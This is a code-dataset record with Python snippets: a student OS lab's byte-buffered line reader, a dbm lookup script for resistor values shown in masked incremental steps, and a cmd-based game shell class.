if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from os import read
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
'''
Paulie Jo Gonzalez
CS 4375 - os
Lab 0
Last modified: 02/14/2021
This code includes a reference to C code for my_getChar method provided by Dr. Freudenthal.
'''
from os import read
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100) # allocate bytes
if limit == 0:
return ''
if next_c >= len(limit) - 1: # check upperbound
return ''
ch = chr(limit[next_c]) # convert to char (from ASCII)
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
# get each char of line
while (ch != '\n'): # while char is not new line
line += ch # build line
ch = get_char()
if ch == '':
return line # EOF
next_c = 0 # reset next_c and limit after line is read
limit = 0
line += '\n'
return line
# def my_read_lines():
# num_lines = 0
# in_line = my_read_line() # read line
# while len(in_line):
# num_lines += 1
# print(f'###line {num_lines}: <{str(in_line)}> ###\n')
# in_line = my_read_lines()
# print(f'eof after {num_lines}\n')
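# Added usage sketch (kept commented so the module stays import-safe):
#   line = my_read_line()
#   while line:
#       print(line, end='')
#       line = my_read_line()
# Two behaviors worth noting in get_char above: after the first read(),
# `limit` holds bytes, so `next_c == limit` only becomes true again once
# my_read_line resets both counters to 0; and `next_c >= len(limit) - 1`
# means the final byte of each 100-byte chunk is never returned.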
|
flexible
|
{
"blob_id": "67ac5d82bc37b67cfdae73b6667b73b70ed33cfb",
"index": 8868,
"step-1": "<mask token>\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-3": "<mask token>\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-4": "<mask token>\nfrom os import read\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-5": "'''\nPaulie Jo Gonzalez\nCS 4375 - os\nLab 0\nLast modified: 02/14/2021\nThis code includes a reference to C code for my_getChar method provided by Dr. Freudenthal.\n'''\n\nfrom os import read\n\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n\n if next_c == limit:\n next_c = 0\n limit = read(0, 100) # allocate bytes\n\n if limit == 0:\n return ''\n\n if next_c >= len(limit) - 1: # check upperbound\n return ''\n ch = chr(limit[next_c]) # convert to char (from ASCII)\n next_c += 1\n\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n\n line = ''\n ch = get_char()\n\n # get each char of line\n while (ch != '\\n'): # while char is not new line\n line += ch # build line\n ch = get_char()\n if ch == '':\n return line # EOF\n\n next_c = 0 # reset next_c and limit after line is read\n limit = 0\n line += '\\n'\n\n return line\n\n\n# def my_read_lines():\n# num_lines = 0\n# in_line = my_read_line() # read line\n\n# while len(in_line):\n# num_lines += 1\n# print(f'###line {num_lines}: <{str(in_line)}> ###\\n')\n\n# in_line = my_read_lines()\n# print(f'eof after {num_lines}\\n')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
db = dbm.open('resistorvalues', 'c')
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import dbm
db = dbm.open('resistorvalues', 'c')
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
"""
Looks up values in createresistorvaluesdbm.py.
Outputs string value ( cmd ).
"""
import dbm
# Open a DB. The c option opens in read/write mode and creates the file if needed.
db = dbm.open( 'resistorvalues', 'c' )
with open( "dummyoutput.txt", "r" ) as file_object:
#print (file_object.readline(6))
data = file_object.readlines()
# Go through serial string line by line
for line in data:
# parse on semi-colon
words = line.split( ";" )
#print (line.rsplit(";"))
# Ignore position information and pull out resistor values
# Note every fourth item to compensate for word pairs
for i in range( 1, len( words ), 4 ):
# print(words[i])
            # the get method takes 2 values: the lookup key, and what to return if there is no match (in this case `0`)
if db.get( words[ i ], 0 ) != 0:
# Direction, i.e. "f"
cmd1 = db.get( words[ i ] )
# Value, i.e. "10"
cmd2 = db.get( words[ i + 2 ] )
# Formatting space
                space = b' '
cmd = cmd1 + space + cmd2
#print (cmd.decode('ascii'))
print ( cmd )
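# Added note: Python 3's dbm stores keys and values as bytes (str keys are
# encoded implicitly), so cmd1/cmd2/cmd above are bytes objects; decode with
# cmd.decode('ascii') if a str is wanted, as the commented line shows.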
|
flexible
|
{
"blob_id": "69eb62ba47a63cf007334c777709b0513d75f396",
"index": 1504,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-3": "<mask token>\ndb = dbm.open('resistorvalues', 'c')\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-4": "<mask token>\nimport dbm\ndb = dbm.open('resistorvalues', 'c')\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-5": "\"\"\"\r\n Looks up values in createresistorvaluesdbm.py.\r\n Outputs string value ( cmd ).\r\n\"\"\"\r\n\r\nimport dbm\r\n\r\n# Open a DB. The c option opens in read/write mode and creates the file if needed.\r\ndb = dbm.open( 'resistorvalues', 'c' )\r\n\r\n\r\nwith open( \"dummyoutput.txt\", \"r\" ) as file_object:\r\n#print (file_object.readline(6))\r\n data = file_object.readlines()\r\n # Go through serial string line by line\r\n for line in data:\r\n # parse on semi-colon\r\n words = line.split( \";\" )\r\n #print (line.rsplit(\";\"))\r\n # Ignore position information and pull out resistor values\r\n # Note every fourth item to compensate for word pairs\r\n for i in range( 1, len( words ), 4 ):\r\n # print(words[i])\r\n # the get method has 2 vlues lookup, and what to return is no match in this case is `0`\r\n if db.get( words[ i ], 0 ) != 0:\r\n # Direction, i.e. \"f\"\r\n cmd1 = db.get( words[ i ] )\r\n # Value, i.e. \"10\"\r\n cmd2 = db.get( words[ i + 2 ] )\r\n # Formatting space\r\n space = b( ' ' )\r\n cmd = cmd1 + space + cmd2\r\n #print (cmd.decode('ascii'))\r\n print ( cmd )\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
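# Added sketch (optional alternative, not part of the original pipeline):
# subprocess surfaces a non-zero exit status as an exception, whereas
# os.system only returns it, e.g.
#   import subprocess
#   subprocess.run(['sh', 'psfex_all.sh'], check=True)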
|
normal
|
{
"blob_id": "c23125018a77508dad6fd2cb86ec6d556fbd1019",
"index": 90,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<mask token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-3": "<mask token>\nstart_time = time.time()\n<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-4": "<mask token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def do_drawCard(self):
pass
<|reserved_special_token_0|>
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
<|reserved_special_token_0|>
def do_drawCard(self):
pass
<|reserved_special_token_0|>
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
<|reserved_special_token_0|>
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CMD(Cmd):
def __init__(self):
pass
def do_move(self, direction):
if direction == 'up':
self.game.movePlayer(0, 1)
elif direction == 'down':
self.game.movePlayer(0, -1)
elif direction == 'left':
self.game.movePlayer(-1, 0)
elif direction == 'right':
self.game.movePlayer(1, 0)
else:
print('No valid direction given.')
def do_rotateTile(self, rotation):
pass
def do_placeTile(self):
pass
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
def loadFile(filePath):
self.game.loadFile(filePath)
<|reserved_special_token_1|>
from cmd import Cmd
class CMD(Cmd):
def __init__(self):
        super().__init__()  # cmd.Cmd.__init__ sets up cmdqueue/completekey used by cmdloop()
def do_move(self, direction):
if direction == "up":
self.game.movePlayer(0, 1)
elif direction == "down":
self.game.movePlayer(0, -1)
elif direction == "left":
self.game.movePlayer(-1, 0)
elif direction == "right":
self.game.movePlayer(1, 0)
else:
print("No valid direction given.")
def do_rotateTile(self, rotation):
pass
def do_placeTile(self):
pass
def do_drawCard(self):
pass
def do_run(self):
pass
def do_fight(self):
pass
def do_save(self, fileName):
self.game.save(fileName)
def do_load(self, fileName):
self.game.load(fileName)
def do_quit(self):
return True
def validateCommands(self):
pass
# New
    def loadFile(self, filePath):
self.game.loadFile(filePath)
# End New
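# Added usage sketch (assumes a game object is attached before the loop):
#   shell = CMD()
#   shell.game = some_game
#   shell.cmdloop()
# Caveat: cmd.Cmd dispatches every command as do_name(self, arg), so the
# zero-argument handlers above (do_quit, do_fight, ...) raise TypeError
# when typed at the prompt unless they accept an `arg` parameter.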
|
flexible
|
{
"blob_id": "03a024140d8d0136bf9838f8942539f6d19bb351",
"index": 1866,
"step-1": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n def do_drawCard(self):\n pass\n <mask token>\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CMD(Cmd):\n\n def __init__(self):\n pass\n\n def do_move(self, direction):\n if direction == 'up':\n self.game.movePlayer(0, 1)\n elif direction == 'down':\n self.game.movePlayer(0, -1)\n elif direction == 'left':\n self.game.movePlayer(-1, 0)\n elif direction == 'right':\n self.game.movePlayer(1, 0)\n else:\n print('No valid direction given.')\n\n def do_rotateTile(self, rotation):\n pass\n <mask token>\n\n def do_drawCard(self):\n pass\n <mask token>\n\n def do_fight(self):\n pass\n\n def do_save(self, fileName):\n self.game.save(fileName)\n\n def do_load(self, fileName):\n self.game.load(fileName)\n\n def do_quit(self):\n return True\n\n def validateCommands(self):\n pass\n\n def loadFile(filePath):\n self.game.loadFile(filePath)\n",
